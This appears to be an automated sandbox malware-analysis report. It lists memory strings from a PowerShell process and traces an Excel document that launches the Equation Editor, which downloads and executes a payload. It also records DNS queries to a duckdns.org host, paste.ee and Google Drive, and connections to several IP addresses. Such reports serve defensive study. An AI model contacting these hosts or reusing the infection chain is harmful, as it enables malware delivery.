                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.520159401.0000000000270000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdbSHA256 source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.520159401.0000000000270000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17a source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.520159401.0000000000270000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp

                      Software Vulnerabilities

                      barindex
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_035006DC URLDownloadToFileW,ShellExecuteW,ExitProcess,3_2_035006DC
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_0350070A ShellExecuteW,ExitProcess,3_2_0350070A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_03500627 LoadLibraryW,3_2_03500627
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_0350055E ExitProcess,3_2_0350055E
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_035006F5 ShellExecuteW,ExitProcess,3_2_035006F5
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_0350072F ExitProcess,3_2_0350072F
                      Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Source: global trafficDNS query: name: wednesdayyyyyyfile.duckdns.org
                      Source: global trafficDNS query: name: wednesdayyyyyyfile.duckdns.org
                      Source: global trafficDNS query: name: paste.ee
                      Source: global trafficDNS query: name: paste.ee
                      Source: global trafficDNS query: name: drive.google.com
                      Source: global trafficDNS query: name: drive.usercontent.google.com
                      Source: global trafficDNS query: name: wednesdayyyyyyfile.duckdns.org
                      Source: global trafficDNS query: name: ip-api.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.178.134:80
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.134:80
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 208.95.112.1:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
